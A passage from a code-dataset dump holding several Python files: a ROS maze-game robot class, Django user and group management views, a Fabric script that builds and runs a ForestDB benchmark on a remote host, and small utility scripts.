the time the maze was started, last should be the completion time.\n self.healthAtGoal = [] #/< Keeps track of what the robot's health was as it arrives at every goal.\n self.inputDelay = [] #/< Stores the time in seconds between when the robot arrives at a goal and when the user sends the next navigation goal.\n self.trustScores = [] #/< The UN-normalized trust scores for each input\n if rospy.hasParam(robotName + \"/goal_tolerance\"):\n rospy.loginfo(\"%s had parameter 'goal_tolerance' in public node handle\", self.name)\n rospy.getParam(self.name + \"/goal_tolerance\", self.goal_tolerance)\n elif rospy.hasParam(\"goal_tolerance\"):\n rospy.loginfo(\"%s had parameter 'goal_tolerance' in private handle\", self.name)\n rospy.getParam(\"goal_tolerance\", self.goal_tolerance)\n else:\n rospy.loginfo(\"%s did not have a parameter name goal_tolerance! Defaulting to .2!\", self.name)\n self.goal_tolerance = .2\n\n self.disparity = []\n self.goalArivalTimestamps = []\n\n def submitScores(self, req, res):\n self.callSubmitScoresService()\n return True\n\n def newGoalCallback(self):\n pass\n\n def resetRobot(self):\n self.started = False\n self.curState = RobotState.IDLE\n self.pointDex = 0\n self.health = 100000\n self.distance = 0.0\n self.oldDistance = 0.0\n self.curGoal = self.model.expectedPoints.at(0)\n self.disparity.x = []\n self.goalArivalTimestamps = []\n self.healthAtGoal = []\n\n def setState(self, state):\n self.curState = state\n\n def getCurState(self):\n return self.curState\n\n def isStarted(self):\n return self.started\n\n def setGameModel(self, modelVar):\n self.model = modelVar\n\n def getName(self):\n return self.name\n\n def addDispPoint(self, point):\n self.disparity.append(point)\n\n def getAverageDisp(self, returned):\n for i in range(len(self.disparity)):\n returned[i] += self.disparity[i].z\n return returned\n\n def getStartTime(self):\n if self.curState == RobotState.RUNNING_MAZE:\n if not len(self.goalArivalTimestamps) == 0:\n return rospy.Time(self.goalArivalTimestamps[0])\n else:\n return rospy.Time(-1.0)\n\n\n def getRunDuration(self):\n if self.curState == RobotState.RUNNING_MAZE:\n if not self.goalArivalTimestamps == 0:\n return rospy.Duration(self.goalArivalTimestamps[len(self.goalArivalTimestamps) - 1] - self.goalArivalTimestamps[0])\n else:\n return rospy.Duration(-1.0)\n\n\n def callback(self, pointRec, timeRec):\n # geometry_msgs::Point toAdd #The disparity point to add to the list of disparity points in self.dispPoints\n target = self.model.getExpPointAt(self.pointDex)\n #Record goal input delay\n #ros::Duration inputDelay = self.arivedAtLastGoal - msg->header.stamp\n delay = rospy.Duration(self.arivedAtLastGoal - timeRec)\n self.inputDelay.append(delay.to_sec())\n rospy.loginfo(\"Goal input delay was %.6f\", rospy.Duration(delay.to_sec()))\n # Add this point to givenPoints and add the expected point to expectePoints\n # self.givenPoints.append(msg->pose.position)\n self.givenPoints.append(pointRec)\n self.expectedPoints.append(target)\n # std::cout << \"exp point from model x: \" << exp.x << \" y: \" << exp.y << \" z:\" << exp.z << '\\n'\n # Store the disparity data in toAdd\n # toAdd.x = fabs(self.curGoal.x - msg->pose.position.x)\n # toAdd.y = fabs(self.curGoal.y - msg->pose.position.y)\n toAdd = Point()\n toAdd.x = abs(target.x - pointRec.x)\n toAdd.y = abs(target.y - pointRec.y)\n toAdd.z = abs(pow(toAdd.x, 2.0) + pow(toAdd.y, 2.0))\n #Perform evaluation of the user's input using the \"trust\" function\n trustValue = (toAdd.z + ((10000.0 - self.health)/ 10000.0) - (10.0 * delay.toSec()))\n self.trustScores.append(trustValue)\n rospy.loginfo(\"Calculated trust: %.6f\\n\\td = %.6f\\n\\th = %6.f\\n\\ttd = %.6f\", trustValue, toAdd.z, ((10000.0 - self.health)/ 10000.0), (10.0 * delay.toSec()))\n # rospy.loginfo(\"Expected (%.6f, %.6f) got (%.6f, %.6f)\", self.curGoal.x, self.curGoal.y, msg->pose.position.x, msg->pose.position.y)\n rospy.loginfo(\"Expected (%.6f, %.6f) got (%.6f, %.6f)\", target.x, target.y, pointRec.x, pointRec.y)\n rospy.loginfo(\"Calculated Disparity: x: %.6f, y: %.6f, total: %.6f\\n\", toAdd.x, toAdd.y, toAdd.z)\n self.addDispPoint(toAdd)\n avgDisp = 0.\n for i in range(len(self.disparity)):\n avgDisp += self.disparity[i].z\n rospy.loginfo(\"Average disparity so far: %.6f\\n\", avgDisp)\n\n def getDistanceToMazeWalls(self, i, p3transform):\n p1 = Point()\n p2 = Point()\n p3 = Point()\n # distance, numerator, denominator\n if i <= 0:\n i = 1\n elif i >= len(self.model.expectedPoints):\n i = len(self.model.expectedPoints) - 1\n\n p1 = self.model.getExpPointAt(i - 1)\n p2 = self.model.getExpPointAt(i)\n\n p3.x = p3transform.pose.position.x\n p3.y = p3transform.pose.position.y\n p3.z = p3transform.pose.position.z\n\n #ensure that we are able to compute the distance to the line segment\n if p1.x == p2.x:\n if p3.y < min(p1.y, p2.y) or p3.y > max(p1.y, p2.y):\n return -1.0\n else:\n if p3.x < min(p1.x, p2.x) or p3.x > max(p1.x, p2.x):\n return -1.0\n\n #Formulas\n # distance = |(y2 - y1)p3.x - (x2 - x1)p3.y + x2*y1 - x1*y2| / sqrt( (y2 - y1)^2 + (x2 - y1)^2)\n #distance = ( fabs( (p2.y - p1.y) * p3.getOrigin().x() - (p2.x - p1.x) * p3.getOrigin().y() + p2.x*p1.y - p2.y*p1.x ) / sqrt( pow(p2.y - p1.y, 2.0) + pow(p2.x - p1.x, 2.0) ) )\n\n numerator = abs( (p2.y - p1.y) * p3.x - (p2.x - p1.x) * p3.y + p2.x*p1.y - p2.y*p1.x)\n denominator = math.sqrt(pow(p2.y - p1.y, 2.0) + pow(p2.x - p1.x, 2.0) )\n distance = numerator / denominator\n return distance\n\n def checkDistance(self):\n\n #See if the Robot is in the IDLE state, and do nothing if it is\n if self.curState == RobotState.IDLE:\n return\n\n # geometry_msgs::PoseStamped pBase, pMap\n pBase = PoseStamped()\n pMap = PoseStamped()\n pBase.header.frame_id = self.name + \"/base_link\"\n pBase.pose.position.x = 0.0\n pBase.pose.position.y = 0.0\n pBase.pose.orientation = Quaternion(*quaternion_from_euler(0., 0., 0., \"sxyz\"))# createQuaternionMsgFromYaw(0.0)\n\n # tf::TransformListener tfListener\n current_transform = rospy.Time.now()\n\n try:\n TransformListener.waitForTransform(pBase.header.frame_id, \"/map\", rospy.Time(), rospy.Duration(10.0))\n TransformListener.getLatestCommonTime(pBase.header.frame_id, \"/map\", current_transform, None)\n pBase.header.stamp = current_transform\n #transform the robot's pose, pBase, into the map frame, pMap. pMap will contain these coordinates\n #according to the TF data available at time \"current_transform\"\n TransformListener.transformPose(\"/map\", pBase, pMap)\n except tf.Exception as e:\n rospy.logerr(\"%s\", e.what())\n rospy.Duration(1.0).sleep()\n\n distance = self.getDistanceToMazeWalls(self.pointDex, pMap)\n\n if distance >= self.oldDistance:\n self.oldDistance = distance\n\n # Only perform the distance pentalty check if the robot is actually running the maze\n if distance > self.goal_tolerance and self.curState == RobotState.RUNNING_MAZE:\n self.health -= 1\n rospy.loginfo(\"%s: Ouch!\\n\\tHealth: %i\\n\\tDistance: %.6f\\n\", self.name,self.health, distance)\n\n # See if we have reached the next goal\n rospy.loginfo(\"%s is %.6f from goal x: %.3f, y: %.3f, z: %.3f\", self.name, math.sqrt( pow(self.curGoal.x - pMap.pose.position.x, 2.0) + pow(self.curGoal.y - pMap.pose.position.y, 2.0) ), self.curGoal.x, self.curGoal.y, self.curGoal.z)\n\n if math.sqrt(pow(self.curGoal.x - pMap.pose.position.x, 2.0) + pow(self.curGoal.y - pMap.pose.position.y, 2.0)) <= self.goal_tolerance:\n self.arivedAtLastGoal = rospy.Time.now()\n\n rospy.loginfo(\"%s has reached goal at pointDex = %i\", self.name, self.pointDex)\n self.pointDex += 1\n rospy.loginfo(\"%s's pointDex is now: %i\", self.name, self.pointDex)\n\n #\t\trospy.loginfo(\"PointDex: %i\\n\", pointDex)\n\n #Have we finished the maze?\n if self.pointDex == len(self.model.expectedPoints):\n rospy.loginfo(\"%s completed the maze!\", self.name)\n self.curState = RobotState.FINISHED_MAZE\n self.started = False\n\n #Submit our scores\n self.callSubmitScoresService()\n return\n\n #Get the next goal from the model and save the status information for the goal we have just arrived at\n curGoal = self.model.getExpPointAt(self.pointDex)\n self.oldDistance = 0.\n self.goalArivalTimestamps.append(rospy.Time.now().toSec())\n self.healthAtGoal.append(self.health)\n\n def callSubmitScoresService(self):\n #\tros::ServiceClient client = self.public_nh.serviceClient(\"submit_score\")\n\n #\tmaze_game::SubmitScores::Request req\n #\treq.robot_name = self.name\n #\treq.goal_arival_times = self.goalArivalTimestamps\n #\treq.damage_at_goal = self.healthAtGoal\n\n #\tmaze_game::SubmitScores::Response res\n\n lengths = [len(self.healthAtGoal), len(self.givenPoints), len(self.expectedPoints), len(self.inputDelay), len(self.trustScores)]\n\n for i in range(len(lengths)):\n rospy.loginfo(\"lengths @ %i: %i\", i, lengths[i])\n\n maxLength = max(lengths)\n rospy.loginfo(\"maxLength: %i\", maxLength)\n\n\n if len(self.goalArivalTimestamps) < maxLength:\n rospy.loginfo(\"goalArivalTimeStamps size: %i. Resizing...\", len(self.goalArivalTimestamps))\n for i in range(len(self.goalArivalTimestamps) - 1, maxLength, 1):\n self.goalArivalTimestamps.append(-86401.0) #24 * 60 * 60 - 1\n\n if len(self.healthAtGoal) < maxLength:\n rospy.loginfo(\"healthAtGoal size: %i. Resizing...\", len(self.healthAtGoal))\n for i in range(len(self.healthAtGoal) - 1, maxLength, 1):\n self.healthAtGoal.append(- (sys.maxint-1))\n\n nullPoint = Point()\n nullPoint.x = -86401.0\n nullPoint.y = -86401.0\n nullPoint.z = -86401.0\n\n if len(self.givenPoints) < maxLength:\n rospy.loginfo(\"givenPoints size: %i. Resizing...\", len(self.givenPoints))\n for i in range(len(self.givenPints)-1, maxLength, 1):\n self.givenPoints.append(nullPoint)\n\n if len(self.expectedPoints < maxLength):\n rospy.loginfo(\"expectedPoints size: %i. Resizing...\", len(self.expectedPoints))\n for i in range(len(self.expectedPints)-1, maxLength, 1):\n self.expectedPoints.append(nullPoint)\n\n if len(self.inputDelay) < maxLength:\n rospy.loginfo(\"inputDelay size: %i. Resizing...\", self.inputDelay.size())\n for i in range(len(self.inputDelay)-1, maxLength, 1):\n self.inputDelay.append(-86401.0)\n\n if len(self.trustScores) < maxLength:\n rospy.loginfo(\"trustScores size: %i. Resizing...\", self.trustScores.size())\n for i in range(len(self.trustScores)-1, maxLength, 1):\n self.trustScores.append(-86401.0)\n\n self.model.submitAndUpdateAverageScores(self.name, self.goalArivalTimestamps, self.healthAtGoal, self.givenPoints, self.expectedPoints, self.inputDelay, self.trustScores)\n\n def newGoalCallback(self, msg, pointDex):\n self.callback(msg.pose.position, msg.header.stamp)\n self.checkDistance()\n\ndef make_robot(name, modelPtr):\n\treturn Robot(name, modelPtr)","sub_path":"ROS_Packages/src/maze_test/maze_game/scripts/Robot.py","file_name":"Robot.py","file_ext":"py","file_size_in_byte":16817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"614157252","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.db import IntegrityError\nfrom django.db.models import Q\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, render\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import *\nfrom django.template import Context\nfrom DonkeyBase import methods\nfrom DonkeyBase.forms import SearchForm\nfrom DonkeyBase.methods import OwnPermission\nfrom benutzerverwaltung.models import *\n\nMODEL_STRING_USER = 'Benutzer'\nMODEL_STRING_GRUPPE = 'Gruppe'\n\n# Create your views here\ndef loginView(request):\n \"\"\"\n shows a login page for the user.\n\n :param request: request\n :return:\n If the password is wrong or the user is inactive he will be redirected to the login.\n If the user passes the login he will be redirected to the the index\n \"\"\"\n if not request.user.is_authenticated():\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n # Redirect to a success page.\n return render(request, 'index.html')\n else:\n # Return a 'disabled account' error message\n return HttpResponseRedirect('/benutzerverwaltung/loginFault')\n else:\n # Return an 'invalid login' error message.\n invalid = \"Der Benutzername und das Passwort passen nicht zusammen\"\n c = {'invalid':invalid}\n return render(request, 'benutzerverwaltung/login.html', c)\n else:\n return render(request, 'benutzerverwaltung/login.html')\n else:\n return render(request, 'index.html')\n\ndef logoutView(request):\n \"\"\"\n Log the active user out\n :param request: current request\n :return: redirect to the login\n \"\"\"\n logout(request)\n return HttpResponseRedirect('/')\n\n@login_required(login_url='/')\ndef editPw(request):\n \"\"\"\n shows the edit password form\n\n :param request: current request\n :return: rendered site (in the context there is True or False)\n \"\"\"\n samePW = \"\"\n if request.method == 'POST':\n user = request.user\n pwOne = request.POST['pwOne']\n pwTwo = request.POST['pwTwo']\n if user.is_authenticated():\n if checkPassword(pwOne, pwTwo):\n user.set_password(pwOne)\n user.save()\n samePW = True\n else:\n samePW = False\n contex = Context({'samePW': samePW})\n return render(request, 'benutzerverwaltung/editPasswort.html', contex)\n\n@login_required(login_url='/')\ndef editOwnUser(request):\n \"\"\"\n shows the userform for the logged in user to edit his own profile\n :param request: current request\n :return: rendered site (benutzerverwaltung/editOwnUser.html)\n \"\"\"\n if request.method == 'POST':\n username = request.POST['username']\n lastname = request.POST['lastName']\n firstname = request.POST['firstName']\n email = request.POST['mail']\n user = request.user\n user.first_name = firstname\n user.last_name = lastname\n user.username = username\n user.email = email\n user.save()\n\n return render(request, 'benutzerverwaltung/editOwnUser.html')\n\n@login_required(login_url='/')\ndef showUser(request):\n \"\"\"\n shows all user with a search box.\n (checks automatically if the user got permissions to see the users)\n :param request: current request\n :return:\n rendered site (benutzerverwaltung/showUser.html) with a context (objects, search)\n if the user didnt got the permission to see the users, this returns an error page\n \"\"\"\n PERMISSION_MESSAGE = 'Sie haben keine Berechtigung um alle Benutzer zu sehen'\n permission = OwnPermission.can_read(request, MODEL_STRING_USER)\n if permission:\n allUser = User.objects.all()\n search = SearchForm()\n contex = Context({'allUser':allUser, 'search':search})\n if request.method == 'POST':\n suche = request.POST['search']\n objects = User.objects.all().filter(Q(username__icontains=suche)| Q(last_name__icontains=suche) | Q(first_name__icontains=suche))\n search = SearchForm()\n contex = Context({'allUser':objects, 'search': search})\n return render(request, 'benutzerverwaltung/showUser.html', contex)\n context = {'permission_message': PERMISSION_MESSAGE}\n return render(request, 'noPermission.html', context)\n\n@login_required(login_url='/')\ndef deleteUser(request, id):\n \"\"\"\n deletes a user\n (checks automatically if the user got permissions to delete the users)\n :param request: current request\n :param id: the id of the user\n :return: rendered site (noPermission.html)\n \"\"\"\n PERMISSION_MESSAGE = 'Sie haben keine Berechtigung um einen Benutzer zu loeschen'\n permission = OwnPermission.can_edit(request, MODEL_STRING_USER)\n if permission:\n userID = get_object_or_404(User, pk=id).delete()\n return HttpResponseRedirect('/benutzerverwaltung/showUser')\n context = {'permission_message': PERMISSION_MESSAGE}\n return render(request, 'noPermission.html', context)\n\n@login_required(login_url='/')\ndef editUser(request, id):\n \"\"\"\n shows a user form for edit the user and saves it\n :param request: current request\n :param id:the id of the user\n :return: redirect to site benutzerverwaltung/showUser\n \"\"\"\n PERMISSION_MESSAGE = 'Sie haben keine Berechtigung um einen Benutzer zu bearbeiten'\n permission = OwnPermission.can_edit(request, MODEL_STRING_USER)\n if permission:\n userID = get_object_or_404(User, pk=id)\n contex = Context({'benutzer':userID})\n if request.method == 'POST':\n username = request.POST['username']\n email = request.POST['mail']\n lastName = request.POST['lastName']\n firstName = request.POST['firstName']\n superUser = request.POST.getlist('isAdmin')\n userID.username = username\n userID.email = email\n userID.last_name = lastName\n userID.first_name = firstName\n userID.is_staff = False\n for sUser in superUser:\n if sUser == 'on':\n userID.is_staff = True\n userID.save()\n return HttpResponseRedirect('/benutzerverwaltung/showUser')\n return render(request, 'benutzerverwaltung/editUser.html', contex)\n context = {'permission_message': PERMISSION_MESSAGE}\n return render(request, 'noPermission.html', context)\n\n@login_required(login_url='/')\ndef addUser(request):\n \"\"\"\n shows a user form for adding users, validate and saves it\n\n :param request: current request\n :return: rendered site (benutzerverwaltung/createUser.html)\n \"\"\"\n PERMISSION_MESSAGE = 'Sie haben keine Berechtigung um einen Benutzer zu bearbeiten'\n permission = OwnPermission.can_write(request, MODEL_STRING_USER)\n if permission:\n if request.method == 'POST':\n userForm = UserCreationForm(data=request.POST)\n allUser = User.objects.all()\n search = SearchForm()\n if userForm.is_valid():\n userForm.save()\n context = {'allUser':allUser, 'search':search}\n return render(request, 'benutzerverwaltung/showUser.html', context)\n else:\n userForm = UserCreationForm()\n c = {'form':userForm}\n return render(request, 'benutzerverwaltung/createUser.html', c)\n else:\n context = {'permission_message': PERMISSION_MESSAGE}\n return render(request, 'noPermission.html', context)\n\ndef checkPassword(pwOne, pwTwo):\n \"\"\"\n checks 2 given string if they are the same\n :param pwOne: string\n :param pwTwo: string\n :return: true if they are the same, false if not\n \"\"\"\n if pwOne == pwTwo:\n return True\n else:\n return False\n\n@login_required(login_url='/')\ndef showGruppe(request):\n \"\"\"\n shows all groups\n\n :param request: current\n :return:rendered site (benutzerverwaltung/showGruppe.html)\n \"\"\"\n PERMISSION_MESSAGE = 'Sie haben keine Berechtigung um alle Gruppen zu sehen'\n permission = OwnPermission.can_read(request, MODEL_STRING_GRUPPE)\n if permission:\n gruppe = Gruppe.objects.all()\n contex = Context({'gruppe':gruppe})\n return render(request, 'benutzerverwaltung/showGruppe.html', contex)\n context = {'permission_message': PERMISSION_MESSAGE}\n return render(request, 'noPermission.html', context)\n\n@login_required(login_url='/')\ndef deleteGruppe(request, grpID):\n \"\"\"\n deletes a group\n\n :param request: current request\n :param grpID: id of the grpID\n :return: redirect to /benutzerverwaltung/showGruppe/\n \"\"\"\n PERMISSION_MESSAGE = 'Sie haben keine Berechtigung um alle Gruppen zu sehen'\n permission = OwnPermission.can_read(request, MODEL_STRING_GRUPPE)\n if permission:\n get_object_or_404(Gruppe, pk=grpID).delete()\n return HttpResponseRedirect('/benutzerverwaltung/showGruppe/')\n context = {'permission_message': PERMISSION_MESSAGE}\n return render(request, 'noPermission.html', context)\n\n@login_required(login_url='/')\ndef addGruppe(request):\n \"\"\"\n shows a form for adding a group, validate and saves it\n :param request: current request\n :return: redirect to /benutzerverwaltung/editGruppe/\n \"\"\"\n PERMISSION_MESSAGE = 'Sie haben keine Berechtigung um eine Gruppe hinzuzufuegen'\n permission = OwnPermission.can_write(request, MODEL_STRING_GRUPPE)\n if permission:\n if request.method == 'POST':\n name = request.POST['name']\n try:\n Gruppe(name=name).save()\n except IntegrityError:\n return methods.ohohError(request, \"Diese Gruppe existiert bereits\", \"/benutzerverwaltung/createGruppe\")\n newGroup = Gruppe.objects.get(name=name)\n grpID = newGroup.grpID\n return HttpResponseRedirect('/benutzerverwaltung/editGruppe/'+str(grpID))\n return render(request, 'benutzerverwaltung/createGruppe.html')\n context = {'permission_message': PERMISSION_MESSAGE}\n return render(request, 'noPermission.html', context)\n\n@login_required(login_url='/')\ndef editGruppe(request, grpID):\n \"\"\"\n shows a form for edit a group and saves it\n :param request: current request\n :param grpID: the group id\n :return: redirect to /benutzerverwaltung/showGruppe/\n \"\"\"\n PERMISSION_MESSAGE = 'Sie haben keine Berechtigung um eine Gruppen zu bearbeiten'\n permission = OwnPermission.can_edit(request, MODEL_STRING_GRUPPE)\n if permission:\n gruppe_ID = get_object_or_404(Gruppe, pk=grpID)\n gruppe = Gruppe.objects.all()\n userInGrp = []\n permInGrp = []\n\n for x in gruppe_ID.bnID.all():\n userInGrp.append(x.username)\n\n user_not_in = User.objects.exclude(username__in=userInGrp)\n\n for y in gruppe_ID.tbID.all():\n permInGrp.append(y.bezeichnung)\n\n perm_not_in = Tabelle_Berechtigung.objects.exclude(bezeichnung__in=permInGrp)\n\n if request.method == 'POST':\n gruppenName = request.POST['name']\n gruppe_ID.name = gruppenName\n gruppe_ID.save()\n peopleInGroup = request.POST.getlist('inGroup[]')\n peopleNotInGroup = request.POST.getlist('notInGroup[]')\n permissionNotInGroup = request.POST.getlist('permNotIn[]')\n permissionInGroup = request.POST.getlist('permIn[]')\n\n for pplNotInG in peopleNotInGroup:\n gruppe_ID.bnID.remove(User.objects.get(username=pplNotInG))\n\n for pplInG in peopleInGroup:\n gruppe_ID.bnID.add(User.objects.get(username=pplInG))\n\n for permInG in permissionInGroup:\n gruppe_ID.tbID.add(Tabelle_Berechtigung.objects.get(bezeichnung=permInG))\n\n for permNotInG in permissionNotInGroup:\n gruppe_ID.tbID.remove(Tabelle_Berechtigung.objects.get(bezeichnung=permNotInG))\n\n return HttpResponseRedirect('/benutzerverwaltung/showGruppe')\n\n contex = Context({'gruppe':gruppe, 'gruppe_ID':gruppe_ID, 'user_not_in': user_not_in, 'perm_not_in':perm_not_in})\n return render(request, 'benutzerverwaltung/editGruppe.html', contex)\n context = {'permission_message': PERMISSION_MESSAGE}\n return render(request, 'noPermission.html', context)\n\n@login_required(login_url='/')\ndef showRight(request):\n \"\"\"\n shows the groups and their rights\n :param request: current request\n :return: rendered site (benutzerverwaltung/userRight.html)\n \"\"\"\n activeUser = request.user\n groups = Gruppe.objects.all()\n userInGroup = []\n\n for group in groups:\n if group.name != \"Administrator\":\n for user in group.bnID.all():\n if activeUser == user:\n userInGroup.append((group.name, [perm.bezeichnung for perm in group.tbID.all()]))\n context = {'userInGroup':userInGroup}\n return render(request, 'benutzerverwaltung/userRight.html', context)","sub_path":"DonkeyBase/benutzerverwaltung/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"488232846","text":"import argparse\nimport fabric\nimport logging\nimport pprint\nimport requests\nimport urllib2\nimport urlparse\nimport xmltodict\n\nfrom fabric.api import run, hosts, env, execute, shell_env\nfrom fabric.context_managers import cd\nfrom logger import logger\nfrom StringIO import StringIO\n\nargs = None\nprog_name = \"forestdb_standalone_test\"\n\n\ndef iter_urls():\n SHERLOCK_BUILDS = (\n 'http://latestbuilds.hq.couchbase.com/couchbase-server/sherlock/{edition}/')\n\n WATSON_BUILDS = (\n 'http://172.23.120.24/builds/latestbuilds/couchbase-server/watson/{edition}/')\n\n search_bases = [SHERLOCK_BUILDS, WATSON_BUILDS]\n\n patterns = [\n 'couchbase-server-{release}-{edition}-manifest.xml'\n ]\n\n for base in search_bases:\n for pat in patterns:\n url = urlparse.urljoin(\n base.format(**(args.__dict__)), pat.format(**(args.__dict__)))\n yield url\n\n\ndef find_manifest():\n for url in iter_urls():\n try:\n logger.debug(\"Trying {}\".format(url))\n status_code = requests.head(url).status_code\n except ConnectionError:\n continue\n else:\n if status_code == 200:\n logger.info('Found \"{}\"'.format(url))\n return url\n logger.interrupt(\"Cannot find the manifest for given version\")\n\n\ndef fetch_url(xml_url):\n file = urllib2.urlopen(xml_url)\n data = file.read()\n file.close()\n xml_data = xmltodict.parse(data)\n return xml_data\n\n\ndef hash_from_xml(xml_data):\n found = filter(\n lambda tup: tup['@name'] == 'forestdb',\n xml_data['manifest']['project'])[0]\n logger.info(\"Found revision {}\".format(found))\n branch = found.get('@upstream', 'master')\n fdb_hash = found['@revision']\n logger.info(\"Using branch {} hash {}\".format(branch, fdb_hash))\n return branch, fdb_hash\n\n\ndef clone_repo(repo):\n CLONE_TIMEOUT = 60\n cmd = \"git clone {}\".format(repo)\n logger.info(\"Running {}\".format(cmd))\n try:\n run(cmd, pty=False, timeout=CLONE_TIMEOUT)\n except fabric.exceptions.CommandTimeout:\n logger.interrupt(\n \"Failed to clone forestdb under {} seconds\".format(\n CLONE_TIMEOUT))\n\n\ndef compile_forestdb(branch, fdb_hash):\n with cd(args.remote_workdir):\n clone_repo(\"https://github.com/couchbase/forestdb.git\")\n with cd(\"forestdb\"):\n # if not master, move to that branch.\n if branch != \"master\":\n run(\"git checkout -b {0} origin/{0}\".format(branch))\n run(\"git reset --hard {}\".format(fdb_hash))\n logger.warn(\"Patching CMakeLists.txt to use c++0x instead of c++11\")\n run(\"sed -i 's/c++11/c++0x/' CMakeLists.txt\")\n run(\"mkdir build\")\n with cd(\"build\"):\n run(\"cmake ../\")\n run(\"make all\")\n run(\"ls *so\")\n fdb_path = \"{}/forestdb/build/libforestdb.so\".format(args.remote_workdir)\n run(\"ls {}\".format(fdb_path))\n return fdb_path\n\n\ndef compile_standalone_test(fdb_path):\n with cd(args.remote_workdir):\n clone_repo(\"https://github.com/uvenum/forestdb-2ibenchmark.git\")\n with cd(\"forestdb-2ibenchmark\"):\n bench_dir = \"{}/forestdb-2ibenchmark\".format(args.remote_workdir)\n fdb_dir = \"{}/forestdb\".format(args.remote_workdir)\n cmd = \"g++ -o {} -Werror\".format(prog_name)\n cmd += \" -I{0} -I{0}/utils -I{1}/include/\".format(bench_dir, fdb_dir)\n cmd += \" -L{}/build\".format(fdb_dir)\n cmd += \" forestdb_workload.cc strgen.cc utils/iniparser.cc\"\n cmd += \" -lforestdb -lpthread\"\n run(cmd)\n run(\"mv {} ../\".format(prog_name))\n run(\"cp bench_config.ini ../\")\n\n\ndef run_standalone_test():\n run(\"service couchbase-server stop\", warn_only=True)\n with shell_env(LD_LIBRARY_PATH=\"{}/forestdb/build\".format(args.remote_workdir)):\n with cd(args.remote_workdir):\n run(\"mkdir data\")\n run(\"ldd ./{}\".format(prog_name))\n run(\"./{}\".format(prog_name))\n\n\ndef cleanup_remote_workdir():\n run(\"mkdir -p {}\".format(args.remote_workdir))\n run(\"rm -rf {}\".format(args.remote_workdir))\n run(\"mkdir -p {}\".format(args.remote_workdir))\n\n\ndef main():\n xml_url = find_manifest()\n xml_data = fetch_url(xml_url)\n branch, fdb_hash = hash_from_xml(xml_data)\n\n execute(cleanup_remote_workdir)\n fdb_path = execute(compile_forestdb, branch, fdb_hash)\n execute(compile_standalone_test, fdb_path)\n execute(run_standalone_test)\n\n\ndef get_args():\n global args\n parser = argparse.ArgumentParser(\n description='forestdb stand alone test'\n ' that intends to mimic secondary workload')\n\n parser.add_argument('--version', dest=\"version\", required=True)\n parser.add_argument('--host', dest=\"host\", required=True)\n parser.add_argument('--remote_workdir', dest=\"remote_workdir\", default=\"/tmp/standalone_forestdb\")\n\n args = parser.parse_args()\n\n (args.release, args.edition) = args.version.split('-')\n\n env.hosts = [args.host]\n env.user = \"root\"\n env.password = \"couchbase\"\n\n# logger.setLevel(logging.DEBUG)\n# logger.handlers[0].setLevel(logging.DEBUG)\n\nif __name__ == \"__main__\":\n get_args()\n main()\n","sub_path":"standalone_tests/forestdb_secondary/forestdb_secondary_test.py","file_name":"forestdb_secondary_test.py","file_ext":"py","file_size_in_byte":5287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"265869827","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import patterns, url\n\nurlpatterns = patterns(\n 'Instanssi.admin_utils.views',\n url(r'^$', 'index', name=\"index\"),\n url(r'^diskcleaner/', 'diskcleaner', name=\"diskcleaner\"),\n url(r'^dbchecker/', 'dbchecker', name=\"dbchecker\"),\n)","sub_path":"Instanssi/admin_utils/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"601108004","text":"import sys\n# usage\n# python3 CreateNGrams.py InputFileName OutputFileName\n\n#pylint: disable=E1101\n# reading data from file\nprint(\"\\n\\033[1;37m\")\n\ninputFile = None\noutputFile = None\n\ntry:\n inputFile = sys.argv[1]\n outputFile = sys.argv[2]\nexcept:\n print(\"\\nInput File Command is Not Correct\")\n sys.exit()\n\nwith open(inputFile, \"r\", encoding='utf-8') as sourceDoc:\n data = sourceDoc.readlines()\n\n\ndef CreateNGram(tokens, limit):\n tempLimit = limit\n ngram = \"\"\n i = 0\n j = 0\n NewNgram = []\n for i in range(len(tokens)-1):\n for j in range(i, limit):\n ngram += tokens[j] + \" \"\n if j == limit-1:\n NewNgram.append(ngram.strip())\n limit += tempLimit\n ngram = \"\"\n break\n elif (j == len(tokens)-1):\n NewNgram.append(ngram.strip())\n ngram = \"\"\n break\n elif len(ngram.strip().split()) == tempLimit:\n NewNgram.append(ngram.strip())\n ngram = \"\"\n break\n\n return NewNgram\n\n\nprint(\"Creating Phrases...\")\nof = open(outputFile, \"w+\", encoding='utf-8')\ntotalNgram = 0\nfor line in data:\n tokens = line.split()\n ngram = CreateNGram(tokens, 20)\n totalNgram += len(ngram)\n for line in ngram:\n of.write(line+\"\\n\")\n\nprint(\"Total Phrases:\", totalNgram)\nprint(\"\\n\\033[1;32m output is saved in \", outputFile)\n","sub_path":"Solve/ReadData/CreateNGrams.py","file_name":"CreateNGrams.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"581992401","text":"# -*- coding: utf-8 -*-\n__author__ = 'Lvv'\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nfrom FieldGenerator.FieldBase import FieldBase\n\nclass guo_ji_huo_che_piao(FieldBase):\n def __init__(self, datasource, version=1, *args, **kwargs):\n FieldBase.__init__(self, datasource, version)\n self.che_piao_ming = None\n self.chu_piao_fei = None\n self.shi_yong_tian_shu = None\n self.zuo_wei_lei_xing = None\n self.che_piao_lei_xing = None\n self.cheng_ren = None\n self.er_tong = None\n self.qing_nian = None\n self.zhang_zhe = None\n\n def makemap(self):\n return {\n u'车票名': self.che_piao_ming,\n u'出票费': self.chu_piao_fei,\n u'使用天数': self.shi_yong_tian_shu,\n u'座位类型': self.zuo_wei_lei_xing,\n u'车票类型': self.che_piao_lei_xing,\n u'成人': self.cheng_ren,\n u'儿童': 